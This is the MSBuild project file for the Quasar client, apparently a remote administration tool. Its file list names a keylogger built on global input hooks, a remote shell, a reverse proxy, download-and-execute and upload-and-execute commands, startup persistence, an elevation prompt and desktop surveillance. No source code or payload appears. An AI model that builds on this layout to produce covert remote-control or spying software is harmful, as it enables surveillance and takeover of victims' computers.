Quasar/Client/Client.csproj

293 lines
17 KiB
XML

<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
<ProductVersion>8.0.30703</ProductVersion>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>xClient</RootNamespace>
<AssemblyName>Client</AssemblyName>
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\Bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\Bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup>
<StartupObject>xClient.Program</StartupObject>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Core\Client.cs" />
<Compile Include="Core\Commands\CommandHandler.cs" />
<Compile Include="Core\Commands\ConnectionHandler.cs" />
<Compile Include="Core\Commands\FileHandler.cs" />
<Compile Include="Core\Commands\MiscHandler.cs" />
<Compile Include="Core\Commands\SurveillanceHandler.cs" />
<Compile Include="Core\Commands\SystemHandler.cs" />
<Compile Include="Core\Compression\SafeQuickLZ.cs" />
<Compile Include="Core\Elevation\CommandButton.cs">
<SubType>Component</SubType>
</Compile>
<Compile Include="Core\Elevation\FrmElevation.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Core\Elevation\FrmElevation.Designer.cs">
<DependentUpon>FrmElevation.cs</DependentUpon>
</Compile>
<Compile Include="Core\Encryption\AES.cs" />
<Compile Include="Core\Encryption\SHA256.cs" />
<Compile Include="Core\Helper\FileSplit.cs" />
<Compile Include="Core\Helper\UnsafeStreamCodec.cs" />
<Compile Include="Core\Information\OSInfo.cs" />
<Compile Include="Core\Compression\JpgCompression.cs" />
<Compile Include="Core\Extensions\SocketExtensions.cs" />
<Compile Include="Core\Keylogger\Hook.cs" />
<Compile Include="Core\Keylogger\HotKeys\HotKeyArgs.cs" />
<Compile Include="Core\Keylogger\HotKeys\HotKeySet.cs" />
<Compile Include="Core\Keylogger\HotKeys\HotKeySetCollection.cs" />
<Compile Include="Core\Keylogger\HotKeys\HotKeySetsListener.cs" />
<Compile Include="Core\Keylogger\IKeyboardEvents.cs" />
<Compile Include="Core\Keylogger\IKeyboardMouseEvents.cs" />
<Compile Include="Core\Keylogger\IMouseEvents.cs" />
<Compile Include="Core\Keylogger\Implementation\AppEventFacade.cs" />
<Compile Include="Core\Keylogger\Implementation\AppKeyListener.cs" />
<Compile Include="Core\Keylogger\Implementation\AppMouseListener.cs" />
<Compile Include="Core\Keylogger\Implementation\BaseListener.cs" />
<Compile Include="Core\Keylogger\Implementation\ButtonSet.cs" />
<Compile Include="Core\Keylogger\Implementation\Callback.cs" />
<Compile Include="Core\Keylogger\Implementation\EventFacade.cs" />
<Compile Include="Core\Keylogger\Implementation\GlobalEventFacade.cs" />
<Compile Include="Core\Keylogger\Implementation\GlobalKeyListener.cs" />
<Compile Include="Core\Keylogger\Implementation\GlobalMouseListener.cs" />
<Compile Include="Core\Keylogger\Implementation\KeyboardState.cs" />
<Compile Include="Core\Keylogger\Implementation\KeyListener.cs" />
<Compile Include="Core\Keylogger\Implementation\MouseListener.cs" />
<Compile Include="Core\Keylogger\Implementation\Subscribe.cs" />
<Compile Include="Core\Keylogger\KeyEventArgsExt.cs" />
<Compile Include="Core\Keylogger\KeyPressEventArgsExt.cs" />
<Compile Include="Core\Keylogger\LoggerHelper.cs" />
<Compile Include="Core\Keylogger\MouseEventExtArgs.cs" />
<Compile Include="Core\Keylogger\WinApi\AppMouseStruct.cs" />
<Compile Include="Core\Keylogger\WinApi\CallbackData.cs" />
<Compile Include="Core\Keylogger\WinApi\HookHelper.cs" />
<Compile Include="Core\Keylogger\WinApi\HookIds.cs" />
<Compile Include="Core\Keylogger\WinApi\HookNativeMethods.cs" />
<Compile Include="Core\Keylogger\WinApi\HookProcedure.cs" />
<Compile Include="Core\Keylogger\WinApi\HookProcedureHandle.cs" />
<Compile Include="Core\Keylogger\WinApi\HookResult.cs" />
<Compile Include="Core\Keylogger\WinApi\KeyboardHookStruct.cs" />
<Compile Include="Core\Keylogger\WinApi\KeyboardNativeMethods.cs" />
<Compile Include="Core\Keylogger\WinApi\Messages.cs" />
<Compile Include="Core\Keylogger\WinApi\MouseNativeMethods.cs" />
<Compile Include="Core\Keylogger\WinApi\MouseStruct.cs" />
<Compile Include="Core\Keylogger\WinApi\Point.cs" />
<Compile Include="Core\Keylogger\WinApi\ThreadNativeMethods.cs" />
<Compile Include="Core\Packets\ClientPackets\DesktopResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DirectoryResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DownloadFileResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DrivesResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetLogsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetProcessesResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetStartupItemsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetSystemInfoResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\MonitorsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\ShellCommandResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\UserStatus.cs" />
<Compile Include="Core\Packets\PacketHandler.cs" />
<Compile Include="Core\Packets\ServerPackets\Action.cs" />
<Compile Include="Core\Packets\ServerPackets\AddStartupItem.cs" />
<Compile Include="Core\Packets\ServerPackets\Delete.cs" />
<Compile Include="Core\Packets\ServerPackets\Desktop.cs" />
<Compile Include="Core\Packets\ServerPackets\Directory.cs" />
<Compile Include="Core\Packets\ServerPackets\DownloadFile.cs" />
<Compile Include="Core\Packets\ServerPackets\DownloadFileCanceled.cs" />
<Compile Include="Core\Packets\ServerPackets\Drives.cs" />
<Compile Include="Core\Packets\ServerPackets\GetLogs.cs" />
<Compile Include="Core\Packets\ServerPackets\GetProcesses.cs" />
<Compile Include="Core\Packets\ServerPackets\GetStartupItems.cs" />
<Compile Include="Core\Packets\ServerPackets\GetSystemInfo.cs" />
<Compile Include="Core\Packets\ServerPackets\KillProcess.cs" />
<Compile Include="Core\Packets\ServerPackets\Monitors.cs" />
<Compile Include="Core\Packets\ServerPackets\RemoveStartupitem.cs" />
<Compile Include="Core\Packets\ServerPackets\Rename.cs" />
<Compile Include="Core\Packets\ServerPackets\ShellCommand.cs" />
<Compile Include="Core\Packets\ServerPackets\ShowMessageBox.cs" />
<Compile Include="Core\Packets\ServerPackets\Update.cs" />
<Compile Include="Core\Packets\ServerPackets\UploadAndExecute.cs" />
<Compile Include="Core\Packets\ServerPackets\VisitWebsite.cs" />
<Compile Include="Core\Packets\ServerPackets\MouseClick.cs" />
<Compile Include="Core\Packets\ServerPackets\StartProcess.cs" />
<Compile Include="Core\ProtoBuf\CallbackAttributes.cs" />
<Compile Include="Core\ProtoBuf\Extensible.cs" />
<Compile Include="Core\ProtoBuf\ExtensibleUtil.cs" />
<Compile Include="Core\ProtoBuf\GlobalSuppressions.cs" />
<Compile Include="Core\ProtoBuf\KeyValuePairProxy.cs" />
<Compile Include="Core\ProtoBuf\ProtoConverterAttribute.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ImmutableCollectionDecorator.cs" />
<Compile Include="Core\RemoteShell\Shell.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnect.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnectResponse.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyData.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyDisconnect.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyClient.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyCommandHandler.cs" />
<Compile Include="Core\SystemCore.cs" />
<Compile Include="Core\Packets\ClientPackets\Status.cs" />
<Compile Include="Core\Packets\ClientPackets\Initialize.cs" />
<Compile Include="Core\Packets\IPacket.cs" />
<Compile Include="Core\Packets\ServerPackets\Disconnect.cs" />
<Compile Include="Core\Packets\ServerPackets\DownloadAndExecute.cs" />
<Compile Include="Core\Packets\ServerPackets\Uninstall.cs" />
<Compile Include="Core\Packets\ServerPackets\InitializeCommand.cs" />
<Compile Include="Core\Packets\ServerPackets\Reconnect.cs" />
<Compile Include="Core\Packets\UnknownPacket.cs" />
<Compile Include="Core\ProtoBuf\BclHelpers.cs" />
<Compile Include="Core\ProtoBuf\BufferExtension.cs" />
<Compile Include="Core\ProtoBuf\BufferPool.cs" />
<Compile Include="Core\ProtoBuf\DataFormat.cs" />
<Compile Include="Core\ProtoBuf\Helpers.cs" />
<Compile Include="Core\ProtoBuf\IExtensible.cs" />
<Compile Include="Core\ProtoBuf\IExtension.cs" />
<Compile Include="Core\ProtoBuf\ImplicitFields.cs" />
<Compile Include="Core\ProtoBuf\Meta\AttributeMap.cs" />
<Compile Include="Core\ProtoBuf\Meta\BasicList.cs" />
<Compile Include="Core\ProtoBuf\Meta\CallbackSet.cs" />
<Compile Include="Core\ProtoBuf\Meta\MetaType.cs" />
<Compile Include="Core\ProtoBuf\Meta\RuntimeTypeModel.cs" />
<Compile Include="Core\ProtoBuf\Meta\SubType.cs" />
<Compile Include="Core\ProtoBuf\Meta\TypeFormatEventArgs.cs" />
<Compile Include="Core\ProtoBuf\Meta\TypeModel.cs" />
<Compile Include="Core\ProtoBuf\Meta\ValueMember.cs" />
<Compile Include="Core\ProtoBuf\NetObjectCache.cs" />
<Compile Include="Core\ProtoBuf\PrefixStyle.cs" />
<Compile Include="Core\ProtoBuf\ProtoContractAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoEnumAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoException.cs" />
<Compile Include="Core\ProtoBuf\ProtoIgnoreAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoIncludeAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoMemberAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoReader.cs" />
<Compile Include="Core\ProtoBuf\ProtoWriter.cs" />
<Compile Include="Core\ProtoBuf\SerializationContext.cs" />
<Compile Include="Core\ProtoBuf\Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ArrayDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\BlobSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\BooleanSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ByteSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\CharSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\CompiledSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DateTimeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DecimalSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DefaultValueDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DoubleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\EnumSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\FieldDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\GuidSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int16Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int32Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int64Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\IProtoSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\IProtoTypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ISerializerProxy.cs" />
<Compile Include="Core\ProtoBuf\Serializers\KeyValuePairDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ListDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\MemberSpecifiedDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\NetObjectSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\NullDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ParseableSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\PropertyDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ProtoDecoratorBase.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SByteSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SingleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\StringSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SubItemSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SurrogateSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SystemTypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TagDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TimeSpanSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TupleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt16Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt32Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt64Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UriDecorator.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoBehaviorAttribute.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoBehaviorExtensionElement.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoEndpointBehavior.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoOperationBehavior.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\XmlProtoSerializer.cs" />
<Compile Include="Core\ProtoBuf\SubItemToken.cs" />
<Compile Include="Core\ProtoBuf\WireType.cs" />
<Compile Include="Core\Helper\Helper.cs" />
<Compile Include="Core\Information\GeoIP.cs" />
<Compile Include="Core\Keylogger\Logger.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Config\Settings.cs" />
<EmbeddedResource Include="Core\Elevation\FrmElevation.resx">
<DependentUpon>FrmElevation.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
<SubType>Designer</SubType>
</EmbeddedResource>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="Properties\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
</None>
<Compile Include="Properties\Settings.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<Content Include="Core\Keylogger\HotKeys\ReadMe.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<PropertyGroup>
<PostBuildEvent>copy "$(TargetPath)" "$(TargetDir)client.bin" /Y</PostBuildEvent>
</PropertyGroup>
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>